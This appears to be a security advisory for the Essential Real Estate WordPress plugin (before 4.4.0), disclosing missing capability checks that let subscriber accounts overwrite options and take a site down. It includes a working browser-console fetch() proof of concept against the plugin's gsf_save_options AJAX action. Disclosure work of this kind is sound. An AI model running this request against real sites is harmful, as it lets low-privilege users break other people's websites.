Essential Real Estate < 4.4.0 - Subscriber+ Denial of Service via Arbitrary Option Update

Description The plugin does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Denial of Service attacks.

PoC

1. login, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete 2. run the following in your browser console: fetch(“/wp-admin/admin-ajax.php?action=gsf_save_options”, {“headers”: {“content-type”: “application/x-www-form-urlencoded”,},“body”: _wpnonce=${GSF_META_DATA['nonce']}&_current_preset=template,“method”: “POST”,}).then((response) => {return response.text(); }).then((data) => {console.log(data);}) The same can be achieved via other AJAX actions in the plugin, like “gsf_import_theme_options”.